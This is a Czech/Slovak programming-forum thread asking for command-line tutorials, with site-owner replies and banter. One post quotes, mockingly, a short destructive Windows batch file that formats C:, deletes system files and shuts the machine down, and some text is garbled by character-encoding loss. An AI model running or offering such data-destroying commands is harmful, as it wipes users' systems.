Dufam ze to nie je proti pravidlam... ?:??
Ale nepoznate nejaky web kde su dobre lekcie na prikazovy riadok? Tu na programujte,com su perfektne ale vychadzaju strasne pomaly. Dik
Fórum › Příkazový řádek
Príkazový riadok www
Teď jsem si všimnul. Díky geone - zvýšil si mi návštěvnost - to jsou moje stránky :-)
bortak: tak to je videt kamo, kdyz ctu ty tvoje prispevky, tak je mi te lito
napr si napsal: ( nechapu jak muzes neco takoveho stvorit :-D
@echo off
format C:
erase C:/WINDOWS/redegit.exe
erase %system32% kernel32.dll
shutdown -s Peknou preinstlaci wokýnek
funguje nepiste komentare je to davkovej soubor funguje nenesu odpovědnost za pripadne skody testovanim
Hele j? jsem tam mysl?m v kapitole o p??kazu format vysv?tlil, ?e nem??e? form?tovat aktu?ln? jednotku a tohle jsem rozhodn? neu?il! A mysl?m, ?e smaz?n? regeditu by se Win br?nil zuby nehty. Ale abyste si nemysleli, ?e je to dokonal? tak d??v tam bylo docela dost chyb, gramatick?ch nebo stylistick?ch, ale ud?lal jsem docela podrobnou korekturu, tak?e mysl?m, ?e jsem to docela z velk? ??sti opravil. Ale te? to mus?m ud?lat n?jak tak aby se to stejn? zobrazovalo ve v?ech prohl??e??ch. V?echno jsem d?lal na Firefoxu a na IE to nevypad? tak dob?e. L?pe ?e?eno na str?nce o DOSu a P??kazov? ??dce jsem se nemoch graficky vy??dit, proto?e by to vypadalo jako p?st na oko.
qteck: triim.net? :-D mno tak pro borltka to bude stacit :-D
mik2: tobe nikdo nic nevycita, ja jsem tu tvoji stranku projel a libi se mi, ale ja bych spis uvital neco podobneho ale ne v cmd, ale ve VBS... :-)
To ShaiMagal: V tom bohužel nemůžu sloužit :ms_0188:
Přidej příspěvek
Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku
×Vložení zdrojáku
×Vložení obrázku
×Vložení videa
Uživatelé prohlížející si toto vlákno
Podobná vlákna
Príkazový riadok?? — založil Gajdošík Tomáš
Prikazovy riadok — založil k2k21
Prikazovy riadok vo VB — založil tommyv580
Java prikazovy riadok — založil Milan